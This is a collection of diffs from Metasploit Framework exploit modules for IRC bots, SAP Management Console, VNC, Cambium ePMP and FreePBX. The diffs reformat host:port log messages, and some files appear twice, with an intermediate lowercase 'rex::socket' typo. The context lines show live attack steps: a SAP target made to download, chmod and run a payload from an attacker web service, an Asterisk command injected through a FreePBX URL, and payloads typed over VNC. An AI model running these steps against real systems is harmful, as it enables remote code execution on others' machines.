       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
@@ -160,14 +160,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect_irc
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the Ra1NX bot...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploiting the Ra1NX bot...")
     ra1nx_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
+++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def connect_irc
-    print_status("#{rhost}:#{rport} - Connecting to IRC server...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Connecting to IRC server...")
     connect
 
     data = ''
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if data and data =~ /020.*wait/
-      print_good("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")
+      print_good("#{rex::socket.to_authority(rhost, rport)} - Connection successful, giving 3 seconds to IRC server to process our connection...")
       select(nil, nil, nil, 3)
     end
   end
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
@@ -160,14 +160,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect_irc
 
-    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     response = register(sock)
     if response =~ /463/ or response =~ /464/
-      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the Ra1NX bot...")
     ra1nx_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/w3tw0rk_exec.rb
+++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb
@@ -67,13 +67,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
 
@@ -142,21 +142,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the IRC bot...")
     w3tw0rk_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/w3tw0rk_exec.rb
+++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb
@@ -67,13 +67,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
 
@@ -142,21 +142,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the IRC bot...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploiting the IRC bot...")
     w3tw0rk_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -79,13 +79,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)}  - Connection to the IRC Server not allowed")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)}  - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
 
@@ -154,21 +154,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the malicious IRC bot...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploiting the malicious IRC bot...")
     xdh_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -79,13 +79,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      vprint_error("#{rhost}:#{rport}  - Connection to the IRC Server not allowed")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)}  - Connection to the IRC Server not allowed")
       return Exploit::CheckCode::Unknown('Connection to the IRC server not allowed')
     end
 
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      vprint_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return Exploit::CheckCode::Unknown('Connection failed')
     end
 
@@ -154,21 +154,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     connect
 
-    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Registering with the IRC Server...")
     res = register(sock)
     if res =~ /463/ || res =~ /464/
-      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Connection to the IRC Server not allowed")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Joining the #{datastore['CHANNEL']} channel...")
     res = join(sock)
     if res !~ /353/ && res !~ /366/
-      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      print_error("#{rex::socket.to_authority(rhost, rport)} - Error joining the #{datastore['CHANNEL']} channel")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
+    print_status("#{rex::socket.to_authority(rhost, rport)} - Exploiting the malicious IRC bot...")
     xdh_command(sock)
 
     quit(sock)

--- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
@@ -108,20 +108,20 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Auto Detecting Remote Platform...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Auto Detecting Remote Platform...")
     my_platform = auto_detect
     if my_platform.nil?
-      print_error("#{rhost}:#{rport} - Remote Platform not detected, continue anyway...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Remote Platform not detected, continue anyway...")
     elsif target['Platform'] == my_platform
-      print_good("#{rhost}:#{rport} - #{target.name} successfully detected...")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - #{target.name} successfully detected...")
     else
-      print_error("#{rhost}:#{rport} - #{target.name} not detected, but #{my_platform}, continue anyway...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - #{target.name} not detected, but #{my_platform}, continue anyway...")
     end
 
     if target.name =~ /Windows/
-      print_status("#{rhost}:#{rport} - Connecting to SAP Management Console SOAP Interface...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Connecting to SAP Management Console SOAP Interface...")
       linemax = datastore['PAYLOAD_SPLIT'] # Values over 9000 can cause issues
-      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 7500
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Using custom payload size of #{linemax}") if linemax != 7500
       execute_cmdstager({ delay: 0.35, linemax: linemax })
     elsif target.name =~ /Linux/
       exploit_linux
@@ -219,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
       service_url = "http://#{Rex::Socket.to_authority(datastore['DOWNHOST'], srvport)}#{resource_uri}"
     else
       service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => proc do |cli, req|
@@ -235,7 +235,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # download payload
     #
-    print_status("#{rhost}:#{rport} - Asking the SAP Management Console to download #{service_url}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the SAP Management Console to download #{service_url}")
     # this filename is used to store the payload on the device
     filename = rand_text_alpha_lower(8)
 
@@ -251,7 +251,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the SAP Management Console to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the SAP Management Console to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload
@@ -263,7 +263,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     cmd = "chmod 777 /tmp/#{filename}"
     cmd.gsub!(/ /, '${IFS}')
-    print_status("#{rhost}:#{rport} - Asking the SAP Management Console to chmod /tmp/#{filename}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the SAP Management Console to chmod /tmp/#{filename}")
     begin
       res = send_soap_request("/bin/sh -c #{cmd}")
     rescue ::Rex::ConnectionError
@@ -275,7 +275,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # execute
     #
     cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the SAP Management Console to execute /tmp/#{filename}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the SAP Management Console to execute /tmp/#{filename}")
     begin
       res = send_soap_request("/bin/sh -c #{cmd}")
     rescue ::Rex::ConnectionError
@@ -288,17 +288,17 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, _request)
     # print_status("on_request_uri called: #{request.inspect}")
     if (!@pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     until (@elf_sent)
@@ -314,7 +314,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts)
     cmd_s = cmd.split('&') # Correct issue with multiple commands on a single line
     if cmd_s.length > 1
-      vprint_status("#{rhost}:#{rport} - Command Stager progress -  Split final payload for delivery (#{cmd_s.length} sections)")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Command Stager progress -  Split final payload for delivery (#{cmd_s.length} sections)")
     end
 
     cmd_s = cmd_s.collect(&:strip)
@@ -334,10 +334,10 @@ class MetasploitModule < Msf::Exploit::Remote
     elsif res and res.code == 500
       body = res.body
       if body.match(/Invalid Credentials/i)
-        print_error("#{rhost}:#{rport} - The Supplied credentials are incorrect")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - The Supplied credentials are incorrect")
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Exploit not complete, check credentials")
       elsif body.match(/Permission denied/i)
-        print_error("#{rhost}:#{rport} - The Supplied credentials are valid, but lack OSExecute permissions")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - The Supplied credentials are valid, but lack OSExecute permissions")
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Exploit not complete, check credentials")
       end
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Exploit not complete, OSExecute isn't working")

--- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
+++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
@@ -137,21 +137,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     if target.name =~ /Windows/
       linemax = datastore['PAYLOAD_SPLIT']
-      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
-      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_CALL_SYSTEM request")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Using custom payload size of #{linemax}") if linemax != 250
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending SOAP SXPG_CALL_SYSTEM request")
       execute_cmdstager({ delay: 0.35, linemax: linemax })
     elsif target.name =~ /Linux/
       file = rand_text_alphanumeric(5)
       stage_one = create_unix_payload(1, file)
-      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Dumping the payload to /tmp/#{file}...")
       res = send_soap_request(stage_one)
       if res and res.code == 200 and res.body =~ /External program terminated/
-        print_good("#{rhost}:#{rport} - Payload dump was successful")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Payload dump was successful")
       else
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
       end
       stage_two = create_unix_payload(2, file)
-      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing /tmp/#{file}...")
       send_soap_request(stage_two)
     end
   end
@@ -187,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
         if res and res.body =~ /faultstring/
           error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
           0.upto(error.length - 1) do |i|
-            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
+            vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error #{error[i]}")
           end
         end
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")

--- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
+++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb
@@ -139,21 +139,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     if target.name =~ /Windows/
       linemax = datastore['PAYLOAD_SPLIT']
-      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
-      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Using custom payload size of #{linemax}") if linemax != 250
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending SOAP SXPG_COMMAND_EXECUTE request")
       execute_cmdstager({ delay: 0.35, linemax: linemax })
     elsif target.name =~ /Linux/
       file = rand_text_alphanumeric(5)
       stage_one = create_unix_payload(1, file)
-      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Dumping the payload to /tmp/#{file}...")
       res = send_soap_request(stage_one)
       if res and res.code == 200 and res.body =~ /External program terminated/
-        print_good("#{rhost}:#{rport} - Payload dump was successful")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Payload dump was successful")
       else
         fail_with(Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
       end
       stage_two = create_unix_payload(2, file)
-      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing /tmp/#{file}...")
       send_soap_request(stage_two)
     end
   end
@@ -189,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
         if res and res.body =~ /faultstring/
           error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
           0.upto(error.length - 1) do |i|
-            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
+            vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error #{error[i]}")
           end
         end
         print_status("#{res.code}\n#{res.body}")

--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def start_cmd_prompt
-    print_status("#{rhost}:#{rport} - Opening Run command")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Opening Run command")
     # Pressing and holding windows key for 1 second
     press_key(WINDOWS_KEY)
     Rex.select(nil, nil, nil, 1)
@@ -123,13 +123,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if password.nil?
-      print_status("#{rhost}:#{rport} - Bypass authentication")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Bypass authentication")
       # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
       sock.put("\x10")
     else
-      print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to authenticate against VNC server")
       if vnc.authenticate(password)
-        print_status("#{rhost}:#{rport} - Authenticated")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Authenticated")
       else
         fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
       end
@@ -142,18 +142,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if target.name =~ /VBScript CMDStager/
       start_cmd_prompt
-      print_status("#{rhost}:#{rport} - Typing and executing payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Typing and executing payload")
       execute_cmdstager({ flavor: :vbs, linemax: 8100 })
       # Exit the CMD prompt
       exec_command('exit')
     elsif target.name =~ /Powershell/
       start_cmd_prompt
-      print_status("#{rhost}:#{rport} - Typing and executing payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Typing and executing payload")
       command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encode_final_payload: true })
       # Execute powershell payload and make sure we exit our CMD prompt
       exec_command("#{command} && exit")
     elsif target.name =~ /Linux/
-      print_status("#{rhost}:#{rport} - Opening 'Run Application'")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Opening 'Run Application'")
       # Press the ALT key and hold it for a second
       press_key(alt_key)
       Rex.select(nil, nil, nil, 1)
@@ -165,17 +165,17 @@ class MetasploitModule < Msf::Exploit::Remote
       # Wait a second for "Run application" to start
       Rex.select(nil, nil, nil, 1)
       # Start a xterm window
-      print_status("#{rhost}:#{rport} - Opening xterm")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Opening xterm")
       exec_command('xterm')
       # Wait a second for "xterm" to start
       Rex.select(nil, nil, nil, 1)
       # Execute our payload and exit (close) the xterm window
-      print_status("#{rhost}:#{rport} - Typing and executing payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Typing and executing payload")
       exec_command("nohup #{payload.encoded} &")
       exec_command('exit')
     end
 
-    print_status("#{rhost}:#{rport} - Waiting for session...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for session...")
     (datastore['TIME_WAIT']).times do
       Rex.sleep(1)
 

--- a/modules/exploits/osx/http/remote_for_mac_rce.rb
+++ b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
     script_name = Rex::Text.rand_text_alpha(8)
 
-    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
+    print_status("Sending exploit to #{Rex::Socket.to_authority(rhost, rport)} via AppleScript")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
       'method' => 'GET',

--- a/modules/exploits/unix/http/epmp1000_get_chart_cmd_shell.rb
+++ b/modules/exploits/unix/http/epmp1000_get_chart_cmd_shell.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
@@ -86,16 +86,16 @@ class MetasploitModule < Msf::Exploit::Remote
       if !get_epmp_ver.nil?
         epmp_ver = get_epmp_ver[1]
         if !epmp_ver.nil?
-          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cambium ePMP 1000 version #{epmp_ver}...")
           return true, epmp_ver
         else
-          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cambium ePMP 1000...")
           epmp_ver = ''
           return true, epmp_ver
         end
       end
     else
-      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")
       epmp_ver = nil
       return false
     end
@@ -173,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       if good_response
-        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
 
         # check if max_user_number_reached?
         if !res.body.include?('max_user_number_reached')
@@ -198,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
           return final_cookie, config_uri_get_chart
         end
       else
-        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
         final_cookie = 'skip'
         config_uri_get_chart = 'skip'
         return final_cookie, config_uri_get_chart

--- a/modules/exploits/unix/http/epmp1000_ping_cmd_shell.rb
+++ b/modules/exploits/unix/http/epmp1000_ping_cmd_shell.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - HTTP Connection Failed...")
       return false
     end
 
@@ -87,16 +87,16 @@ class MetasploitModule < Msf::Exploit::Remote
       if !get_epmp_ver.nil?
         epmp_ver = get_epmp_ver[1]
         if !epmp_ver.nil?
-          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cambium ePMP 1000 version #{epmp_ver}...")
           return true, epmp_ver
         else
-          print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Running Cambium ePMP 1000...")
           epmp_ver = ''
           return true, epmp_ver
         end
       end
     else
-      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")
       epmp_ver = nil
       return false
     end
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       if good_response
-        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_good("SUCCESSFUL LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
 
         # check if max_user_number_reached?
         if !res.body.include?('max_user_number_reached')
@@ -199,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
           return final_cookie, config_uri_ping
         end
       else
-        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+        print_error("FAILED LOGIN - #{Rex::Socket.to_authority(rhost, rport)} - #{user.inspect}:#{pass.inspect}")
         final_cookie = 'skip'
         config_uri_ping = 'skip'
         return final_cookie, config_uri_ping

--- a/modules/exploits/unix/http/freepbx_callmenum.rb
+++ b/modules/exploits/unix/http/freepbx_callmenum.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     (min..max).each do |e|
       connect
-      print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending evil request with range #{e.to_s}")
       res = send_request_raw({
         'method' => 'GET',
         'uri' => "/recordings/misc/callme_page.php?action=c&callmenum=" + e.to_s + "@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",

--- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
+++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
